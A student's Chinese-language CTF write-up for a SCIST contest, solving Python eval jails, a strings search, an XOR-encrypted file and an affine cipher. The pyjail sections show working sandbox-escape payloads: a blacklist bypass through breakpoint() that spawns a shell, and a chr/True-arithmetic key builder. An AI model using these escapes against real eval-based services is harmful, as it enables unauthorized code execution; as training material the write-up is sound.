姓名:林政宇 Discord:yummyegg
# **pyjail 1**
```python
import unicodedata
print(open(__file__).read())
inp = unicodedata.normalize("NFKC", input(">>> "))
blacklist = "0123456789cdfghjlmqsuvwxyz!\"#$%&'*+,-./:;<=>?@[\]^_`{|}~"
if not sum(bad in inp.lower() for bad in blacklist):
print(eval(inp))
else:
print("bad boyQQ")
```
根據黑名單可以發現沒有不在裡面的字符有:**abeiknoprt()**
剛剛好能組成 **breakpoint()** 這個函式
```
--Return--
> <string>(1)<module>()->None
(Pdb)
```
輸入 `print(inp)` 會發現這裡可以正常輸入程式
```
(Pdb) print(inp)
breakpoint()
```
推測 flag 放在與題目的同個資料夾,所以用 os 叫出 shell
```
(Pdb) import os
(Pdb) os.system('sh')
```
輸入 ls 後發現裡面有一個檔案叫 **flag_432rdeoibhedqnjd**
打開後即可拿到 flag
```
cat flag_432rdeoibhedqnjd
SCIST{br34kp01n7_c4n_4l50_6375h3ll}
```
# **pyjail 2**
```python
import unicodedata
print(open(__file__).read())
fg = open("/flag").read()
inp = unicodedata.normalize("NFKC", input(">>> "))
blacklist = "0123456789abdefgijklmnopqstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'*,-./:;<>?@[\]^_`{|}~"
if not sum(bad in inp.lower() for bad in blacklist):
print(eval(f"locals()[{inp}]"))
else:
print("bad boyQQ")
```
沒有在黑名單的字符為:**chr()+=**
而 ```print(eval(f"locals()[{inp}]"))``` 裡的 `locals()` 能夠返回變數的值
推測本題要用以上字元湊出 **fg** 這個字串
嘗試了各種組和發現 `chr==chr` 返回不一樣的報錯訊息
```
KeyError: True
```
而 **True** 不就是等於 **1** 嗎
在 **chr()** 輸入數字就會轉換成對應的 **ASCII**
於是嘗試輸入 `chr(chr==chr)`
```
KeyError: '\x01'
```
於是我把他嘗試加起來,輸入 `chr((chr==chr)+(chr==chr))`
```
KeyError: '\x02'
```
在嘗試把兩個字拼起來,輸入 `chr(chr==chr)+chr(chr==chr)`
```
KeyError: '\x01\x01'
```
由上嘗試我就把很多 `True` 拚起來製造出 `\x102\x103`
### **payload:**
```
chr((chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr))+chr((chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr)+(chr==chr))
```
### **Result:**
`SCIST{y0u_kn0w_wh47?True+True=2}`
# **PeekMe**
一開始看到這個檔案大小還有題目名稱,我的想法是要找到他的原代碼,而 flag 就藏在裡面
使用 IDA 打開他:
在右邊看到了可視字元,推測 flag 就藏在裡面,但我不知道怎麼用 IDA,所以把它丟進 linux
> 其實在第一節課資安課教 Linux 的時候我跳了很多題
> 因為遇到任何題目我都直接用 cat 打開
> 然後flag因為是可視字元所以會直接被打印出來
直接 `cat peekme` 會爆出一堆亂碼
但因為剛剛說的經驗所以我覺得 flag 可以直接找到
所以使用了 strings 與 grep 打出以下
### **payload:**
```
strings peekme | grep "SCIST{.*}"
```
### **result:**
# **TinyEncryptor**
因為我真的不太會用 IDA 所以這題我使用的是解 **LoTux CTF** 用過的 ghidra
這個程式會逐字元讀取檔案。先把每個字元的ASCII值先增加1,在跟 `0xa9` 進行 XOR,並將結果輸出到 encrypted.txt
根據 XOR 的運算定律,進行兩次XOR運算就能把值恢復成原本的
所以只要把每一個字元跟 `0xa9` 進行 XOR,在把ASCII的值減一即可拿到原本的 **plaintext**
### **script:**
```python=
import sys
def decrypt(filename):
with open(filename, 'rb') as inputFile, open('decrypted.txt', 'wb') as outputFile:
while True:
c = inputFile.read(1)
if not c:
break
c = ord(c)
decrypted = ((c ^ 0xa9) - 1) & 0xFF
outputFile.write(bytes([decrypted]))
if __name__ == "__main__":
decrypt("encrypted.txt")
```
### **result(decrypted.txt):**
```
Trusted Computing (TC) is a technology developed and promoted by the Trusted Computing Group.[1] The term is taken from the field of trusted systems and has a specialized meaning that is distinct from the field of confidential computing.[2] With Trusted Computing, the computer will consistently behave in expected ways, and those behaviors will be enforced by computer hardware and software.[1] Enforcing this behavior is achieved by loading the hardware with a unique encryption key that is inaccessible to the rest of the system and the owner.
TC is controversial as the hardware is not only secured for its owner, but also against its owner, leading opponents of the technology like free software activist Richard Stallman to deride it as "treacherous computing",[3][4] and certain scholarly articles to use scare quotes when referring to the technology.[5][6]
Trusted Computing proponents such as International Data Corporation,[7] the Enterprise Strategy Group[8] and Endpoint Technologies Associates[9] state that the technology will make computers safer, less prone to viruses and malware, and thus more reliable from an end-user perspective. They also state that Trusted Computing will allow computers and servers to offer improved computer security over that which is currently available. Opponents often state that this technology will be used primarily to enforce digital rights management policies (imposed restrictions to the owner) and not to increase computer security.[3][10]: 23
Chip manufacturers Intel and AMD, hardware manufacturers such as HP and Dell, and operating system providers such as Microsoft include Trusted Computing in their products if enabled.[11][12] The U.S. Army requires that every new PC it purchases comes with a Trusted Platform Module (TPM).[13][14] As of July 3, 2007, so does virtually the entire United States Department of Defense.[15]
Key concepts
Trusted Computing encompasses six key technology concepts, of which all are required for a fully Trusted system, that is, a system compliant to the TCG specifications:
Endorsement key
Secure input and output
Memory curtaining / protected execution
Sealed storage
Remote attestation
Trusted Third Party (TTP)
Endorsement key
The endorsement key is a 2048-bit RSA public and private key pair that is created randomly on the chip at manufacture time and cannot be changed. The private key never leaves the chip, while the public key is used for attestation and for encryption of sensitive data sent to the chip, as occurs during the TPM_TakeOwnership command.[16]
This key is used to allow the execution of secure transactions: every Trusted Platform Module (TPM) is required to be able to sign a random number (in order to allow the owner to show that he has a genuine trusted computer), using a particular protocol created by the Trusted Computing Group (the direct anonymous attestation protocol) in order to ensure its compliance of the TCG standard and to prove its identity; this makes it impossible for a software TPM emulator with an untrusted endorsement key (for example, a self-generated one) to start a secure transaction with a trusted entity. The TPM should be[vague] designed to make the extraction of this key by hardware analysis hard, but tamper resistance is not a strong requirement.
Memory curtaining
Memory curtaining extends common memory protection techniques to provide full isolation of sensitive areas of memory—for example, locations containing cryptographic keys. Even the operating system does not have full access to curtained memory. The exact implementation details are vendor specific.
Sealed storage
Sealed storage protects private information by binding it to platform configuration information including the software and hardware being used. This means the data can be released only to a particular combination of software and hardware. Sealed storage can be used for DRM enforcing. For example, users who keep a song on their computer that has not been licensed to be listened will not be able to play it. Currently, a user can locate the song, listen to it, and send it to someone else, play it in the software of their choice, or back it up (and in some cases, use circumvention software to decrypt it). Alternatively, the user may use software to modify the operating system's DRM routines to have it leak the song data once, say, a temporary license was acquired. Using sealed storage, the song is securely encrypted using a key bound to the trusted platform module so that only the unmodified and untampered music player on his or her computer can play it. In this DRM architecture, this might also prevent people from listening to the song after buying a new computer, or upgrading parts of their current one, except after explicit permission of the vendor of the song.
Remote attestation
Remote attestation allows changes to the user's computer to be detected by authorized parties. For example, software companies can identify unauthorized changes to software, including users modifying their software to circumvent commercial digital rights restrictions. It works by having the hardware generate a certificate stating what software is currently running. The computer can then present this certificate to a remote party to show that unaltered software is currently executing. Numerous remote attestation schemes have been proposed for various computer architectures, including Intel,[17] RISC-V,[18] and ARM.[19]
Remote attestation is usually combined with public-key encryption so that the information sent can only be read by the programs that requested the attestation, and not by an eavesdropper.
To take the song example again, the user's music player software could send the song to other machines, but only if they could attest that they were running an authorized copy of the music player software. Combined with the other technologies, this provides a more restricted path for the music: encrypted I/O prevents the user from recording it as it is transmitted to the audio subsystem, memory locking prevents it from being dumped to regular disk files as it is being worked on, sealed storage curtails unauthorized access to it when saved to the hard drive, and remote attestation prevents unauthorized software from accessing the song even when it is used on other computers. To preserve the privacy of attestation responders, Direct Anonymous Attestation has been proposed as a solution, which uses a group signature scheme to prevent revealing the identity of individual signers.
Proof of space (PoS) have been proposed to be used for malware detection, by determining whether the L1 cache of a processor is empty (e.g., has enough space to evaluate the PoSpace routine without cache misses) or contains a routine that resisted being evicted.[20][21]
Here's your flag: SCIST{br3ak_t3e_enCryp71on!}
```
# **affine**
```python
import hashlib
import random
from secret import FLAG, PARAGRAPH
SHUFFLE = "ytJlwsZOjXgLfRvBcTIKbVoUiNGYQWqaFDMPdmphAuCnkEreSxHz"
assert FLAG == f"SCIST{{{hashlib.sha256(PARAGRAPH.encode()).hexdigest()}}}"
def affine(data: str, a: int, b: int) -> str:
results = []
for char in data:
try:
x = SHUFFLE.index(char)
y = (a * x + b) % len(SHUFFLE)
results.append(SHUFFLE[y])
except ValueError:
results.append(char)
return "".join(results)
def main():
text = PARAGRAPH
for _ in range(7):
a = 2 * random.randint(0, 5) + 1
b = random.randint(1, 13)
text = affine(text, a, b)
print(f"text = {text}")
if __name__ == "__main__":
main()
# text = "OQwwRWEHy, iwHz mAztA iH HQi uQwwEQH, iaQ gyQ ZQXrHi-lyiHQ zW TQagiEA PQwigEAzrH ZQZsQaH zW gyQ HrslyRwrZ BQXrHzczi, tyETy EH i Ziuza liag zW gyQ lyRwrZ nAEXiaEi."
```
根據以上程式碼
a 的值為:1 3 5 7 9 11
正好與 x 互質
每一個字符一定對應著某一個其他字符
所以我嘗試暴力破解出祕文
### **過程:**
`tyETy EH i`
可以先知道這個 i 一定是 a
因為這串字在逗號後面極可能為關係代名詞
which 正好是第二個字母與第五個字母一樣
所以這串字就可以還原成
`which is a`
`iwHz mAztA iH`
因為上一句的推導
這一句話可以替換成 a□s□ □□□w□ as
第一個字明顯是 also
而第二個字我剛剛好想到的是 known 念起來很順
known正好也符第二個字母與第五個字母一樣
所以這串字就可以還原成
`also known as`
`OQwwRWEHy`
可以先替換成 □□ll□□ish
使用word finder嘗試搜索
https://www.merriam-webster.com/wordfinder
第一個字為
`jellyfish`
然後我把他丟到 Copilot 看能不能幫我自動填字之類的
結果這段密文竟然是關於水母的 wiki 的第一句話
按照題目的意思加密一下
### **script:**
```python
import hashlib
PARAGRAPH = "Jellyfish, also known as sea jellies, are the medusa-phase of certain gelatinous members of the subphylum Medusozoa, which is a major part of the phylum Cnidaria."
FLAG = f"SCIST{{{hashlib.sha256(PARAGRAPH.encode()).hexdigest()}}}"
print(FLAG)
```
### **result:**
```
SCIST{1e280ce0b005128db192c077cd6620e1f6612b77ee2e1f165a90d1d27096d9d2}
```
# **心得**
不知道為什麼打完這一次的比賽我突然對資安又多了更濃厚的性致,可能是因為有獎金可以拿?
反正就是打的挺開心的
但沒有welcome題是十分難過 :(
Sign in with Wallet
Connect another wallet